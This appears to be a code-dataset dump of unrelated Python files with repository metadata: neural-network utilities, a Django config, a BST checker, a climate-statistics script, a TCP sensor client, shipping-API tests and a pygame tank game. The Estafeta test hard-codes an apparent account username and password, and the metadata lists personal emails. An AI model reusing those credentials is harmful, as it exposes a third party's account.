        These are different types of computations, and using different
        representations speeds things up.  More details on the
        representations can be found in
        mnist_loader.load_data_wrapper.

        """
        if convert:
            results = [(np.argmax(self.feedforward(x)), np.argmax(y))
                       for (x, y) in data]
        else:
            results = [(np.argmax(self.feedforward(x)), y)
                       for (x, y) in data]
        return sum(int(x == y) for (x, y) in results)
    def total_cost(self, data, lmbda, convert=False):
        """Return the total cost for the data set ``data``.  The flag
        ``convert`` should be set to False if the data set is the
        training data (the usual case), and to True if the data set is
        the validation or test data.  See comments on the similar (but
        reversed) convention for the ``accuracy`` method, above.
        """
        cost = 0.0
        for x, y in data:
            a = self.feedforward(x)
            if convert: y = vectorized_result(y)
            cost += self.cost.fn(a, y)/len(data)
        # Add the L2 regularization term.
        cost += 0.5*(lmbda/len(data))*sum(
            np.linalg.norm(w)**2 for w in self.weights)
        return cost
    def save(self, filename):
        """Save the neural network to the file ``filename``."""
        # Arrays are converted to nested lists so json can serialize them;
        # the cost class is stored by name and resolved again in load().
        data = {"sizes": self.sizes,
                "weights": [w.tolist() for w in self.weights],
                "biases": [b.tolist() for b in self.biases],
                "cost": str(self.cost.__name__)}
        f = open(filename, "w")
        json.dump(data, f)
        f.close()
#### Loading a Network
def load(filename):
    """Load a neural network from the file ``filename``.  Returns an
    instance of Network.

    """
    f = open(filename, "r")
    data = json.load(f)
    f.close()
    # Resolve the cost class by name from this module (the inverse of
    # Network.save, which stored ``cost.__name__``).
    cost = getattr(sys.modules[__name__], data["cost"])
    net = Network(data["sizes"], cost=cost)
    # Overwrite the randomly-initialized parameters with the saved ones.
    net.weights = [np.array(w) for w in data["weights"]]
    net.biases = [np.array(b) for b in data["biases"]]
    return net
#### Miscellaneous functions
def vectorized_result(j):
    """One-hot column vector: a (10, 1) array with 1.0 at index ``j``.

    Converts a digit label (0...9) into the desired network output.
    """
    onehot = np.zeros((10, 1))
    onehot[j] = 1.0
    return onehot
def sigmoid(z):
    """Logistic sigmoid 1/(1 + e^-z), elementwise on arrays."""
    exp_neg = np.exp(-z)
    return 1.0 / (1.0 + exp_neg)
def sigmoid_prime(z):
    """Derivative of the sigmoid, expressed via the sigmoid itself."""
    s = sigmoid(z)
    return s * (1 - s)
| [
"ankit.sagwekar15@gmail.com"
] | ankit.sagwekar15@gmail.com |
8d15fa2b34e2b38cabe5d2e3754b92e1b1d34215 | 49bdc2959c2a133f5bba262af20a95ebf1d2fce8 | /admiralce/apps/ce_ledger/apps.py | c7da233bb0bc3998fc2a4ec272f12d2ae081f814 | [] | no_license | tonjohn/admiralce | ca6049ab3bf2f5193021158be2d1ce3ae3c51a9e | ebc7a2d12780641c997dcee1636ce09f1dbd2e06 | refs/heads/master | 2021-08-23T03:16:56.294892 | 2017-12-02T20:42:46 | 2017-12-02T20:42:46 | 110,373,547 | 1 | 2 | null | 2017-12-02T20:42:47 | 2017-11-11T19:25:57 | Python | UTF-8 | Python | false | false | 157 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class CeLedgerConfig(AppConfig):
name = 'ce_ledger'
| [
"kearlyaa@gmail.com"
] | kearlyaa@gmail.com |
92f278ef1be30da74797d4cdc0bf66045c5f2f1b | ffb56bbe3d383d002adb0a125f80067d78537492 | /code/is_bst/is_bst.py | 7765f85c9d0dc573a71b21bb9016aebc3169b70c | [] | no_license | Hackman-git/Data-structures | e1c5aab7a2f91c4345289673269a97da0c6e5f39 | f8c52c7bd16e601a29b9802fdbc8ae4ebe144077 | refs/heads/master | 2023-01-28T07:21:25.038192 | 2020-12-12T23:22:05 | 2020-12-12T23:22:05 | 320,939,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,174 | py | #!/usr/bin/python3
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**30) # new thread will get stack of such size
# Read the tree from stdin: first the node count, then one line per node
# with "key left_index right_index" (-1 marks a missing child; node 0 is
# the root).
n = int(input().strip())
key = [0 for i in range(n)]
left_ind = [0 for i in range(n)]
right_ind = [0 for i in range(n)]
for i in range(n):
    [a, b, c] = map(int, input().strip().split())
    key[i] = a
    left_ind[i] = b
    right_ind[i] = c
# Filled by inOrder(); holds the strictly-increasing prefix of the traversal.
inorderResult = []
def inOrder(root = 0):
global left_ind, right_ind,n
if n != 0:
if left_ind[root] != -1:
inOrder(left_ind[root])
if len(inorderResult) >= 1 and key[root] > inorderResult[-1]:
inorderResult.append(key[root])
elif len(inorderResult) == 0:
inorderResult.append(key[root])
else:
return
if right_ind[root] != -1:
inOrder(right_ind[root])
def IsBinarySearchTree(arr):
# Implement correct algorithm here
global n
if len(arr) == n:
return True
else:
return False
def main():
inOrder()
# print(" ".join(str(x) for x in inorderResult))
if IsBinarySearchTree(inorderResult):
print("CORRECT")
else:
print("INCORRECT")
threading.Thread(target=main).start()
| [
"abdulaigbenga96@gmail.com"
] | abdulaigbenga96@gmail.com |
626c922de9219080952e7221d26a8a4a2740ad29 | 6e8b606bca1eaddd8858fffc0fdeda039a438af5 | /source/precipitation/precip_stats_for_central_arctic_to_timeseries.py | 3af2eff5c86951f4471ed3fd8fddbaeec12bb877 | [] | no_license | andypbarrett/SnowOnSeaIce | 1f93a0523933fff0bfdd89fc87ad32b371bae359 | b8fe84a23bf790eb8efc43f4b89725fb7ba7d73c | refs/heads/master | 2023-01-20T11:53:30.835890 | 2023-01-18T17:43:19 | 2023-01-18T17:43:19 | 137,275,118 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,836 | py | #----------------------------------------------------------------------
# Calculates mean of precipitation stats for Arctic Ocean excluding
# Barents and Kara seas. This region conforms to the regions with
# data from the NP drifting stations.
#----------------------------------------------------------------------
import pandas as pd
import os
import utilities as util
from constants import arctic_mask_region as region
from constants import accumulation_period_filepath
def make_outfilepath(fili):
"""Returns output filepath"""
_, ext = os.path.splitext(fili)
return fili.replace(ext, '.npsnow_region.csv')
def precip_stats_for_central_arctic_to_time_series(reanalysis, verbose=False):
ds = util.load_annual_accumulation(reanalysis)
ds['drizzle'] = ds['precTot'] - ds['wetdayTot']
# Make mask for central Arctic excluding Barents and Kara seas
mask = util.read_region_mask()
newmask = (mask == region['CENTRAL_ARCTIC']) | \
(mask == region['BEAUFORT']) | \
(mask == region['CHUKCHI']) | \
(mask == region['LAPTEV']) | \
(mask == region['EAST_SIBERIAN'])
region_mean = ds.where(newmask).mean(dim=['x','y']).to_dataframe()
filo = make_outfilepath(accumulation_period_filepath[reanalysis])
#annual_accumulation_filepath[reanalysis].replace('.nc','.RegionSeries.csv')
print (f'Writing time series to {filo}')
region_mean.to_csv(filo)
return
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Calculates time series of average precip stats for NPSNOW Arctic region")
parser.add_argument('reanalysis', type=str, help='Reanalysis to process')
args = parser.parse_args()
precip_stats_for_central_arctic_to_time_series(args.reanalysis, verbose=True)
| [
"apbarret@nsidc.org"
] | apbarret@nsidc.org |
28218e56736c0aa387e0b52b1481f9011b706757 | 4711e47c536f4001ea0c2f2de5eae0c4b2eabf28 | /streaming_sensors/client_tcp_sensors.py | 86dfc753e0e409ce26a4f235f46f25928f6bdbc2 | [] | no_license | webvalley2015/PhysioWat | af6b2e43a680e37a7f13c6466885206b4671a9d1 | 595fc177a25510677e3b11936d49c9c6a463b4ab | refs/heads/master | 2021-01-15T11:43:18.515845 | 2015-07-10T13:26:45 | 2015-07-10T13:26:45 | 38,247,074 | 7 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,760 | py | import socket
import random
import sys
import time
import struct
import time
from socket import *
def recv_int(f):
x=struct.unpack('!i', f.recv(4))[0]
# print 'int: ', x
return x
def recv_long(f):
x=struct.unpack('!q', f.recv(8))[0]
# print 'long: ', x
return x
def recv_byte(f):
x=ord(f.recv(1)[0])
# print 'byte: ', x
return x
def recv_string(f):
l = ord(f.recv(1)[0])
x=f.recv(l)
# print 'str: ', x
return x
def recv_double(f):
x=struct.unpack('!d', f.recv(8))[0]
# print 'long: ', x
return x
def recv_header(f):
header={}
recv_byte(f)
recv_byte(f)
recv_byte(f)
ns=recv_byte(f)
header['sessionTag']=recv_string(f)
header['sensors']=[]
for i in xrange(ns):
recv_byte(f)
recv_byte(f)
recv_byte(f)
snrs={}
snrs['type']=recv_string(f)
snrs['name']=recv_string(f)
nl=recv_byte(f)
snrs['cols']=[]
for l in xrange(nl):
snrs['cols'].append(recv_string(f))
header['sensors'].append(snrs)
return header
def recv_pack(f,header):
recv_byte(f)
t = recv_byte(f)
data={}
if(t==100):
ids=recv_byte(f)
data['type']=ids
data['timestamp']=recv_long(f)
data['values']=[]
for i in xrange(len(header['sensors'][ids]['cols'])):
data['values'].append(recv_double(f))
elif(t==101):
data['type']='event'
data['timestamp']=recv_long(f)
ids=recv_byte(f)
data['code']=recv_int(f)
data['message']=recv_string(f)
return data
def main():
host = '192.168.205.243' # '127.0.0.1' can also be used
port = 2000
sock = socket()
#Connecting to socket
sock.connect((host, port)) #Connect takes tuple of host and port
#header=recv_header(sock)
#print header
header=recv_header(sock)
print header
while True:
print recv_pack(sock,header)
sock.close()
if __name__ == "__main__":
main()
| [
"cristoforetti@gmail.com"
] | cristoforetti@gmail.com |
85b30b9ab812a82ea1865fc9081398d8b613fc1e | 7a663432b426f471c991e481b88f0738df1d7c42 | /src/demorepo/__init__.py | b35050024df0b42f9e521473a8c07e147a02fee9 | [] | no_license | demosense/demorepo | c2aec1e6daddcbbb0482954545a2fb0605c73737 | 6b02c5153bcceb52d618d285567b625d29db9796 | refs/heads/master | 2020-04-07T16:16:09.230540 | 2018-04-09T11:30:16 | 2018-04-09T11:30:16 | 124,222,329 | 1 | 0 | null | 2018-04-29T19:09:20 | 2018-03-07T10:54:01 | Python | UTF-8 | Python | false | false | 46 | py | from . import commands
__all__ = ['commands'] | [
"javier.cozar@uclm.es"
] | javier.cozar@uclm.es |
9ce51d32d9e61c53a2d027bce33679c610fa8a49 | 1c8d13d1ae081188fcbde3c327164fe77ae8590b | /account_tax_office/__init__.py | eaacf07f67402a9252f480269eaa52b0a068be25 | [] | no_license | aaltinisik/customaddons | 5f624008b167b860b183f17f0812f5adafc8908e | c04e2b9730db07848c153d8245d2df65ec4e2c8f | refs/heads/12.0 | 2023-08-31T23:31:05.802190 | 2023-08-28T06:50:25 | 2023-08-28T06:50:25 | 21,519,767 | 15 | 21 | null | 2023-09-08T08:45:44 | 2014-07-05T12:40:07 | Python | UTF-8 | Python | false | false | 990 | py | # -*- encoding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2015, Eska Yazilim ve Danismanlik A.S.
# http://www.eskayazilim.com.tr
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import models
| [
"onurugur@gitlab.com"
] | onurugur@gitlab.com |
2840783a2139a211a3aaf526a16a654a7698046a | e4d935c8062319d0f718082ec32871943717574f | /DEP_C6/example_6.py | 2c4752df60a414e7fa7019c591845ce3b0066e3a | [] | no_license | zarearia/DigitalImageProcessing-Notebook | 58290c6e041554eae75775ab9f2dc8ba82035aff | d0ae8a5950d2a1afe849c51987463157e0ef2b1e | refs/heads/master | 2022-08-30T01:47:18.818796 | 2020-05-30T10:55:17 | 2020-05-30T10:55:17 | 268,061,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
np.set_printoptions(threshold=np.inf)
# Mark: reading and converting img to value between 0 and 1
img = cv.imread('/Users/ariazare/Projects/Python/DEP_C4/Fig0438(a)(bld_600by600).tif')
img = cv.cvtColor(img, cv.COLOR_RGB2GRAY)
img = np.array(img, 'float32')
# img /= 255
# Mark: creating RGB sin funcs
def creat_sin_func(array, multiple, plus=0):
for i in range(0, array.shape[0]):
array[i] = np.abs(np.sin((i/255) * np.pi * multiple + plus))
return array
blue_func = np.zeros((256), 'float32')
blue_func = creat_sin_func(blue_func, 1)
red_func = np.zeros((256), 'float32')
red_func = creat_sin_func(red_func, 1, 1)
green_func = np.zeros((256), 'float32')
green_func = creat_sin_func(green_func, 1, 2)
# Mark: creating RGB image
def mix_gray_image_with_color_sin_finc(img, color_func):
img_l = np.copy(img)
num = np.array([0], 'int')
for i in range(0, img_l.shape[0]):
for j in range(0, img_l.shape[1]):
num[0] = img_l[i, j]
img_l[i, j] = color_func[num[0]]
return img_l
blue_only_img = np.zeros(img.shape, 'int')
blue_only_img = mix_gray_image_with_color_sin_finc(img, blue_func)
green_only_img = np.zeros(img.shape, 'int')
green_only_img = mix_gray_image_with_color_sin_finc(img, green_func)
red_only_img = np.zeros(img.shape, 'int')
red_only_img = mix_gray_image_with_color_sin_finc(img, red_func)
color_img = np.zeros((img.shape[0], img.shape[1], 3))
color_img[:, :, 0] = red_only_img
color_img[:, :, 1] = green_only_img
color_img[:, :, 2] = blue_only_img
plt.imshow(img)
plt.show()
plt.imshow(color_img)
plt.show()
| [
"ariazare@outlook.com"
] | ariazare@outlook.com |
b586bc73c8abf2ab0858af5c05cb97731f7d31fa | a366db0f2a117e0a8cf923e9b4de5c643155e047 | /bench/state.py | 08dad6e8fdc6e4fca68111ef1035197012e312ac | [] | no_license | genome/nessy-server | d2ff6aa7bb692f50e5cabb435a380670be75b2b9 | f8207310d33bf259130df806b4d759ef1a883e56 | refs/heads/master | 2021-01-10T18:59:38.910186 | 2014-12-29T22:11:16 | 2014-12-29T22:11:16 | 15,785,645 | 0 | 0 | null | 2014-12-29T22:11:16 | 2014-01-10T01:57:38 | Python | UTF-8 | Python | false | false | 2,115 | py | import collections
import datetime
class State(object):
UNSET = object()
def __init__(self, resource_names):
self._state_index = collections.defaultdict(set)
self._state_index['released'].update(resource_names)
self._resource_index = {r: 'released' for r in resource_names}
self._claim_urls = {}
self.transition_count = 0
self._request_times = collections.defaultdict(list)
def get_claim_url(self, resource):
return self._claim_urls[resource]
def resources_in_states(self, *states):
blah = [self._state_index[s] for s in states]
return set.union(*blah)
def set_resource_state(self, resource, state, claim_url=UNSET):
self.transition_count += 1
old_state = self._resource_index.pop(resource)
self._resource_index[resource] = state
self._state_index[old_state].remove(resource)
self._state_index[state].add(resource)
if claim_url is not self.UNSET:
if claim_url is None and resource in self._claim_urls:
self._claim_urls.pop(resource)
else:
self._claim_urls[resource] = claim_url
def noop(self):
self.transition_count += 1
def start_timer(self):
self._begin_time = datetime.datetime.now()
def stop_timer(self):
self._end_time = datetime.datetime.now()
@property
def _total_runtime(self):
return (self._end_time - self._begin_time).total_seconds()
def report(self):
tag_times = {
tag: {
'mean': sum(times) / len(times),
'number': len(times),
'rps': len(times) / sum(times),
}
for tag, times in self._request_times.iteritems()
}
return {
'total_requests': self.transition_count,
'total_runtime': self._total_runtime,
'rps': self.transition_count / self._total_runtime,
'times': tag_times,
}
def register_request(self, tag, seconds):
self._request_times[tag].append(seconds)
| [
"mark.m.burnett@gmail.com"
] | mark.m.burnett@gmail.com |
ee009b5bf52bb7f8428a2d67a049f5f7e5db0bc5 | fa140027a23f85d3f2399f4fdbcef27f62f973ab | /product_release_notes/migrations/0004_auto_20170821_2340.py | 2cd4a878420b429d29dbebd6adfb8914fd4046c2 | [
"MIT"
] | permissive | bjh63742/product-release-notes | 10de8a13ae19311a5a2b82cd7f1599e70b64bb69 | f0068b4fe3d5e6b23144c69094456acd700becab | refs/heads/master | 2022-12-16T18:30:51.001381 | 2020-09-16T14:06:31 | 2020-09-16T14:06:31 | 295,582,583 | 0 | 0 | null | 2020-09-15T01:35:58 | 2020-09-15T01:35:58 | null | UTF-8 | Python | false | false | 604 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-21 23:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product_release_notes', '0003_client_icon'),
]
operations = [
migrations.RemoveField(
model_name='client',
name='current_version',
),
migrations.AlterField(
model_name='releasenote',
name='version',
field=models.CharField(blank=True, db_index=True, max_length=255),
),
]
| [
"nick.r.romano@gmail.com"
] | nick.r.romano@gmail.com |
fad0a9d402c2a9c652ef1ffc6eb8328b5bf559c7 | 5257652fc34ec87fe45d390ba49b15b238860104 | /nn_interpretation/nn_unique/get_nn_unique.py | 0aefadbf1cc44379399634748c270b52f7fc9a45 | [] | no_license | thekingofall/alzheimers_parkinsons | cd247fa2520c989e8dd853ed22b58a9bff564391 | 4ceae6ea3eb4c58919ff41aed8803855bca240c8 | refs/heads/master | 2022-11-30T22:36:37.201334 | 2020-08-12T01:23:55 | 2020-08-12T01:23:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | buddies_nn=set(open('buddies_nn.txt','r').read().strip().split('\n'))
sig_svm=set(open('sig_svm.txt','r').read().strip().split('\n'))
nn_unique=buddies_nn-sig_svm
outf=open('nn_unique.txt','w')
outf.write('\n'.join(nn_unique)+'\n')
| [
"annashcherbina@gmail.com"
] | annashcherbina@gmail.com |
d75327ed3eb1eb548c678947125403d00ff95754 | dc6ddb01df98303fd901f2280c3f290250a6c6e0 | /gui codings/create new window.py | 9b5b58c8be2d5a49d290e3d44a85df571cc6652b | [] | no_license | 051109zol/myschoolworkcodings | 4ac07adc4af1c440ddee6f95652c4d66ab09d3fa | 672db8df023c6405387697fce711cfc3ccd4789e | refs/heads/main | 2023-03-30T09:31:34.815066 | 2021-03-15T15:23:47 | 2021-03-15T15:23:47 | 348,017,596 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from tkinter import *
from PIL import ImageTk, Image
root = Tk ()
root.title ("WEWEWEW")
root.iconbitmap("pewds_qmL_icon.ico")
def open ():
global my_img
top = Toplevel()
top.title ("miniOn")
top.iconbitmap("pewds_qmL_icon.ico")
my_img = ImageTk.PhotoImage(Image.open("gamba/anomaly1.jpg"))
my_label = Label (top, image=my_img).pack()
btn2 = Button (top, text = "Bye Minion!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!", command = top.destroy).pack()
btn = Button(root, text = "Click me to see minion!!!!!!", command = open).pack()
root.mainloop()
| [
"noreply@github.com"
] | 051109zol.noreply@github.com |
392775843ef9a141cf72d2566d5ca45de26aa634 | 5aa27e52058d014bf4fb784d63a70c7d1f565330 | /Games/Tanks.py | 49cfe3c4acab326b37343a174e0e53d14d9bffe0 | [] | no_license | a5vh/AdPro | 2e5c5f952bb917d3b98c277a512670b67ce0718f | 595c1c3e5088ae3cfb85078282dffceb44c1901e | refs/heads/master | 2020-04-11T00:16:37.088549 | 2019-05-05T19:24:53 | 2019-05-05T19:24:53 | 161,381,037 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,458 | py | import sys, time, random, math, pygame
from pygame.locals import *
from MyLibrary import *
class Bullet():
def __init__(self,position):
self.alive = True
self.color = (250,20,20)
self.position = Point(position.x,position.y)
self.velocity = Point(0,0)
self.rect = Rect(0,0,4,4)
self.owner = ""
def update(self,ticks):
self.position.x += self.velocity.x * 10.0
self.position.y += self.velocity.y * 10.0
if self.position.x < 0 or self.position.x > 800 \
or self.position.y < 0 or self.position.y > 600:
self.alive = False
self.rect = Rect(self.position.x, self.position.y, 4, 4)
def draw(self,surface):
pos = (int(self.position.x), int(self.position.y))
pygame.draw.circle(surface, self.color, pos, 4, 0)
def fire_cannon(tank):
position = Point(tank.turret.X, tank.turret.Y)
bullet = Bullet(position)
angle = tank.turret.rotation
bullet.velocity = angular_velocity(angle)
bullets.append(bullet)
play_sound(shoot_sound)
return bullet
def player_fire_cannon():
bullet = fire_cannon(player)
bullet.owner = "player"
bullet.color = (30,250,30)
def enemy_fire_cannon():
bullet = fire_cannon(e)
bullet.owner = "enemy"
bullet.color = (250,30,30)
class Tank(MySprite):
def __init__(self,tank_file="tank.png",turret_file="turret.png"):
MySprite.__init__(self)
self.load(tank_file, 50, 60, 4)
self.speed = 0.0
self.scratch = None
self.float_pos = Point(0,0)
self.velocity = Point(0,0)
self.turret = MySprite()
self.turret.load(turret_file, 32, 64, 4)
self.fire_timer = 0
def update(self,ticks):
#update chassis
MySprite.update(self,ticks,150)
self.rotation = wrap_angle(self.rotation)
self.scratch = pygame.transform.rotate(self.image, -self.rotation)
angle = wrap_angle(self.rotation)
self.velocity = angular_velocity(angle+dir)
self.float_pos.x += self.velocity.x
self.float_pos.y += self.velocity.y
#warp tank around screen edges (keep it simple)
if self.float_pos.x < -50: self.float_pos.x = 800
elif self.float_pos.x > 800: self.float_pos.x = -50
if self.float_pos.y < -60: self.float_pos.y = 600
elif self.float_pos.y > 600: self.float_pos.y = -60
#transfer float position to integer position for drawing
self.X = int(self.float_pos.x)
self.Y = int(self.float_pos.y)
#update turret
self.turret.position = (self.X,self.Y)
self.turret.last_frame = 0
self.turret.update(ticks,100)
self.turret.rotation = wrap_angle(self.turret.rotation)
angle = self.turret.rotation+90
self.turret.scratch = pygame.transform.rotate(self.turret.image, -angle)
def draw(self,surface):
#draw the chassis
width,height = self.scratch.get_size()
center = Point(width/2,height/2)
surface.blit(self.scratch, (self.X-center.x, self.Y-center.y))
#draw the turret
width,height = self.turret.scratch.get_size()
center = Point(width/2,height/2)
surface.blit(self.turret.scratch, (self.turret.X-center.x, self.turret.Y-center.y))
def __str__(self):
return MySprite.__str__(self) + "," + str(self.velocity)
class EnemyTank(Tank):
def __init__(self,tank_file="enemy_tank.png",turret_file="enemy_turret.png"):
Tank.__init__(self,tank_file,turret_file)
def update(self,ticks):
MySprite.update(self,ticks,100)
self.rotation = wrap_angle(self.rotation)
self.scratch = pygame.transform.rotate(self.image, -self.rotation)
angle = wrap_angle(self.rotation)
self.velocity = angular_velocity(angle-90)
self.float_pos.x += self.velocity.x
self.float_pos.y += self.velocity.y
#warp tank around screen edges (keep it simple)
if self.float_pos.x < -50: self.float_pos.x = 800
elif self.float_pos.x > 800: self.float_pos.x = -50
if self.float_pos.y < -60: self.float_pos.y = 600
elif self.float_pos.y > 600: self.float_pos.y = -60
#transfer float position to integer position for drawing
self.X = int(self.float_pos.x)
self.Y = int(self.float_pos.y)
#update turret
self.turret.position = (self.X,self.Y)
self.turret.last_frame = 0
self.turret.update(ticks,100)
self.turret.rotation = wrap_angle(self.turret.rotation)
angle = self.turret.rotation+90
self.turret.scratch = pygame.transform.rotate(self.turret.image, -angle)
def draw(self,surface):
Tank.draw(self,surface)
#this function initializes the game
def game_init():
global screen, backbuffer, font, timer, player_group, player, \
enemy_tank, bullets, crosshair, crosshair_group, enemy_group, explosion
pygame.init()
screen = pygame.display.set_mode((800,600))
backbuffer = pygame.Surface((800,600))
pygame.display.set_caption("Tank Battle Game")
font = pygame.font.Font(None, 30)
timer = pygame.time.Clock()
pygame.mouse.set_visible(False)
#load mouse cursor
crosshair = MySprite()
crosshair.load("crosshair.png")
crosshair_group = pygame.sprite.GroupSingle()
crosshair_group.add(crosshair)
#create player tank
player = Tank()
player.float_pos = Point(400,300)
enemy_group = pygame.sprite.Group()
#create enemy tanks
for n in range(0, 5):
enemy_tank = EnemyTank()
enemy_tank.float_pos = Point(random.randint(50,760), random.randint(50, 550))
enemy_tank.rotation = random.randint(100, 180)
enemy_group.add(enemy_tank)
#create bullets
bullets = list()
# this function initializes the audio system
def audio_init():
global shoot_sound, boom_sound, move_sound
#initialize the audio mixer
pygame.mixer.init()
#load sound files
shoot_sound = pygame.mixer.Sound("shoot.wav")
boom_sound = pygame.mixer.Sound("boom.wav")
move_sound = pygame.mixer.Sound("move.wav")
# this function uses any available channel to play a sound clip
def play_sound(sound):
channel = pygame.mixer.find_channel(True)
channel.set_volume(0.5)
channel.play(sound)
#main program begins
dir = 90
wait = 3
game_init()
audio_init()
game_over = False
player_score = 0
enemy_score = 0
last_time = 0
mouse_x = mouse_y = 0
#main loop
while True:
timer.tick(30)
ticks = pygame.time.get_ticks()
#reset mouse state variables
mouse_up = mouse_down = 0
mouse_up_x = mouse_up_y = 0
mouse_down_x = mouse_down_y = 0
#event section
for event in pygame.event.get():
if event.type == QUIT: sys.exit()
elif event.type == MOUSEMOTION:
mouse_x,mouse_y = event.pos
move_x,move_y = event.rel
elif event.type == MOUSEBUTTONDOWN:
mouse_down = event.button
mouse_down_x,mouse_down_y = event.pos
elif event.type == MOUSEBUTTONUP:
mouse_up = event.button
mouse_up_x,mouse_up_y = event.pos
#get key states
keys = pygame.key.get_pressed()
if keys[K_ESCAPE]: sys.exit()
elif keys[K_LEFT] or keys[K_a]:
#calculate new direction velocity
player.rotation -= 2.0
elif keys[K_RIGHT] or keys[K_d]:
#calculate new direction velocity
player.rotation += 2.0
elif keys[K_s] or keys[K_DOWN]:
#Reverse velocity
play_sound(move_sound)
if dir == -90 and wait < 1:
dir = 90
wait = 3
elif wait < 1:
dir = -90
wait = 3
wait -= 1
elif keys[K_p] and game_over:
dir = 90
wait = 3
game_init()
game_over = False
player_score = 0
elif player_score == 5:
game_over = True
#fire cannon!
if keys[K_SPACE] or mouse_up > 0:
if ticks > player.fire_timer + 500:
player.fire_timer = ticks
player_fire_cannon()
play_sound(move_sound)
#update section
if not game_over:
crosshair.position = (mouse_x,mouse_y)
crosshair_group.update(ticks)
#point tank turret toward crosshair
angle = target_angle(player.turret.X,player.turret.Y,
crosshair.X + crosshair.frame_width/2,
crosshair.Y + crosshair.frame_height/2)
player.turret.rotation = angle
#move tank
player.update(ticks)
#update enemies
for e in enemy_group:
e.update(ticks)
for e in enemy_group:
if ticks > e.fire_timer + 1000:
e.fire_timer = ticks
enemy_fire_cannon()
#update bullets
for bullet in bullets:
bullet.update(ticks)
if bullet.owner == "player":
for e in enemy_group:
if pygame.sprite.collide_rect(bullet, e):
player_score += 1
bullet.alive = False
play_sound(boom_sound)
enemy_group.remove(e)
elif bullet.owner == "enemy":
if pygame.sprite.collide_rect(bullet, player):
enemy_score += 1
bullet.alive = False
play_sound(boom_sound)
game_over = True
#drawing section
backbuffer.fill((100,100,20))
for bullet in bullets:
bullet.draw(backbuffer)
for e in enemy_group:
e.draw(backbuffer)
player.draw(backbuffer)
crosshair_group.draw(backbuffer)
screen.blit(backbuffer, (0,0))
if not game_over:
print_text(font, 0, 0, "PLAYER " + str(player_score))
print_text(font, 700, 0, "ENEMY " + str(enemy_score))
else:
print_text(font, 0, 0, "PLAYER " + str(player_score))
print_text(font, 700, 0, "ENEMY " + str(enemy_score))
print_text(font, 300, 380, "GAME OVER")
print_text(font, 300, 400, "PRESS P TO PLAY AGAIN!")
pygame.display.update()
#remove expired bullets
for bullet in bullets:
if bullet.alive == False:
bullets.remove(bullet) | [
"august.hummert5@gmail.com"
] | august.hummert5@gmail.com |
68082290653ffed19788bd000c3c0e180d32b37d | f200b971bd542b626dddfca31fb9f72323ece616 | /estafeta/tests/test_core.py | ed5add17d09127f9ede433fd491b24c59840d920 | [
"MIT"
] | permissive | Solunest/pyestafeta | 836d2ad5ce957407e42ecf3cfd76d10698fbea81 | cd24cea4973f5184f4cc7e72a653de8b22e32f69 | refs/heads/master | 2021-01-01T15:34:51.389726 | 2017-07-18T23:37:55 | 2017-07-18T23:37:55 | 97,652,675 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,498 | py | import unittest
import estafeta
from estafeta import EstafetaClient
class CoreTests(unittest.TestCase):
def setUp(self):
super().setUp()
def create_core(self):
estafeta_client = EstafetaClient()
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.password)
estafeta.user = 'Usuario1'
estafeta.password = '1GCvGIu$'
estafeta.id = '25'
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.url_tracking)
with self.assertRaises(estafeta.core.EstafetaEmptyField):
print(estafeta_client.url_label)
estafeta.production = False
self.assertEqual(estafeta_client.url_tracking, 'https://trackingqa.estafeta.com/Service.asmx?wsdl')
self.assertEqual(estafeta_client.url_label,
'https://labelqa.estafeta.com/EstafetaLabel20/services/EstafetaLabelWS?wsdl')
estafeta.production = True
self.assertEqual(estafeta_client.url_tracking, 'https://trackingqa.estafeta.com/Service.asmx?wsdl')
self.assertEqual(estafeta_client.url_label,
'https://label.estafeta.com/EstafetaLabel20/services/EstafetaLabelWS?wsdl')
self.assertEqual(estafeta_client.user, 'Usuario1')
self.assertNotEqual(estafeta_client.user, '1GCvGIu$')
self.assertEqual(estafeta_client.password, '1GCvGIu$')
self.assertEqual(estafeta_client.id, '25')
| [
"luigi.lahi@gmail.com"
] | luigi.lahi@gmail.com |
5fee948bb6d78254887e2386f43243c10338ff41 | 94af8241244d6910b96654ffa1bef39131c23844 | /dialog.py | f56c8b5d551159fdfb292ffcaa515b5944be28aa | [] | no_license | eodecker/Data-Visualization-GUI | 248aac7c9e27470d925320df4f4484e0e97ab592 | b81eca1c77da587364a784ab991e623aefc3320a | refs/heads/master | 2020-12-10T17:16:11.548572 | 2020-01-13T17:55:38 | 2020-01-13T17:55:38 | 233,657,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,742 | py | # CS 251
# Spring 2019
# Eli Decker
# Project 4
import display
import tkinter as tk
import numpy as np
class Dialog(tk.Toplevel):
    """Generic modal dialog base class (the classic tkinter dialog pattern).

    Subclasses override body() to build their widgets and apply() to
    harvest results when the user presses OK.  Construction blocks
    (via wait_window) until the dialog is dismissed.
    """
    def __init__(self, parent, title = None):
        """Build the dialog, make it modal, and block until it closes.

        parent -- the window this dialog is transient for
        title  -- optional window title
        """
